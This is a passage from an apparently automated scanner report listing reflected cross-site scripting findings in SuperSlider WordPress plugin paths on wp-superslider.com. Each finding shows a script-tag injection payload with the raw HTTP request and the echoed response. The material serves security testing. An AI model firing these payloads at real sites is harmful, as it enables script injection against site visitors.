Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674569+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674569; expires=Thu, 02-Feb-2012 19:22:49 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-menu/jse75ce\"><script>alert(1)</script>115e8e28446/superslider-menu-min.js" />
...[SNIP]...

4.196. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca307"><script>alert(1)</script>082b33d15a1 was submitted in the REST URL parameter 6. This input was echoed as ca307\"><script>alert(1)</script>082b33d15a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-menu/js/superslider-menu-min.jsca307"><script>alert(1)</script>082b33d15a1 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:51 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674571+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674571; expires=Thu, 02-Feb-2012 19:22:51 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.jsca307\"><script>alert(1)</script>082b33d15a1" />
...[SNIP]...

4.197. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 972b5"><script>alert(1)</script>c3df305ca7c was submitted in the REST URL parameter 1. This input was echoed as 972b5\"><script>alert(1)</script>c3df305ca7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site972b5"><script>alert(1)</script>c3df305ca7c/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:40 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674561+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674561; expires=Thu, 02-Feb-2012 19:22:41 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site972b5\"><script>alert(1)</script>c3df305ca7c/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css" />
...[SNIP]...

4.198. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60b3e"><script>alert(1)</script>54f1bceee82 was submitted in the REST URL parameter 2. This input was echoed as 60b3e\"><script>alert(1)</script>54f1bceee82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content60b3e"><script>alert(1)</script>54f1bceee82/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674562+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674563; expires=Thu, 02-Feb-2012 19:22:43 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content60b3e\"><script>alert(1)</script>54f1bceee82/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css" />
...[SNIP]...

4.199. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e84f7"><script>alert(1)</script>c0fd9f27655 was submitted in the REST URL parameter 3. This input was echoed as e84f7\"><script>alert(1)</script>c0fd9f27655 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/pluginse84f7"><script>alert(1)</script>c0fd9f27655/superslider-menu/plugin-data/superslider/ssMenu/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:44 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674564+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674564; expires=Thu, 02-Feb-2012 19:22:44 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/pluginse84f7\"><script>alert(1)</script>c0fd9f27655/superslider-menu/plugin-data/superslider/ssMenu/default/default.css" />
...[SNIP]...

4.200. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b31fa"><script>alert(1)</script>eb994eb117d was submitted in the REST URL parameter 4. This input was echoed as b31fa\"><script>alert(1)</script>eb994eb117d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-menub31fa"><script>alert(1)</script>eb994eb117d/plugin-data/superslider/ssMenu/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:45 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674565+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674565; expires=Thu, 02-Feb-2012 19:22:45 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-menub31fa\"><script>alert(1)</script>eb994eb117d/plugin-data/superslider/ssMenu/default/default.css" />
...[SNIP]...

4.201. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3ab5"><script>alert(1)</script>b3f3e43ffe4 was submitted in the REST URL parameter 5. This input was echoed as b3ab5\"><script>alert(1)</script>b3f3e43ffe4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-menu/plugin-datab3ab5"><script>alert(1)</script>b3f3e43ffe4/superslider/ssMenu/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:47 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674567+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674567; expires=Thu, 02-Feb-2012 19:22:47 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-menu/plugin-datab3ab5\"><script>alert(1)</script>b3f3e43ffe4/superslider/ssMenu/default/default.css" />
...[SNIP]...

4.202. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a4e7"><script>alert(1)</script>bc1d9122022 was submitted in the REST URL parameter 6. This input was echoed as 8a4e7\"><script>alert(1)</script>bc1d9122022 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-menu/plugin-data/superslider8a4e7"><script>alert(1)</script>bc1d9122022/ssMenu/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:49 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674569+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674569; expires=Thu, 02-Feb-2012 19:22:49 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-menu/plugin-data/superslider8a4e7\"><script>alert(1)</script>bc1d9122022/ssMenu/default/default.css" />
...[SNIP]...

4.203. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93e26"><script>alert(1)</script>3ef7b7b12e4 was submitted in the REST URL parameter 7. This input was echoed as 93e26\"><script>alert(1)</script>3ef7b7b12e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu93e26"><script>alert(1)</script>3ef7b7b12e4/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:50 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674570+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674571; expires=Thu, 02-Feb-2012 19:22:51 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu93e26\"><script>alert(1)</script>3ef7b7b12e4/default/default.css" />
...[SNIP]...

4.204. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 8] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e93d9"><script>alert(1)</script>b1176fcac2 was submitted in the REST URL parameter 8. This input was echoed as e93d9\"><script>alert(1)</script>b1176fcac2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/defaulte93d9"><script>alert(1)</script>b1176fcac2/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:52 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674572+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674573; expires=Thu, 02-Feb-2012 19:22:53 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:53 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/defaulte93d9\"><script>alert(1)</script>b1176fcac2/default.css" />
...[SNIP]...

4.205. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 9] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d43c"><script>alert(1)</script>997d41182e2 was submitted in the REST URL parameter 9. This input was echoed as 5d43c\"><script>alert(1)</script>997d41182e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css5d43c"><script>alert(1)</script>997d41182e2 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:54 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674575+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674575; expires=Thu, 02-Feb-2012 19:22:55 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:55 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css5d43c\"><script>alert(1)</script>997d41182e2" />
...[SNIP]...

4.206. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b259"><script>alert(1)</script>cf11bf0924a was submitted in the REST URL parameter 1. This input was echoed as 7b259\"><script>alert(1)</script>cf11bf0924a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site7b259"><script>alert(1)</script>cf11bf0924a/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:00 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674580+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674580; expires=Thu, 02-Feb-2012 19:23:00 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:00 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site7b259\"><script>alert(1)</script>cf11bf0924a/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js" />
...[SNIP]...

4.207. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wp-superslider.com
Path:	/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js

Issue detail

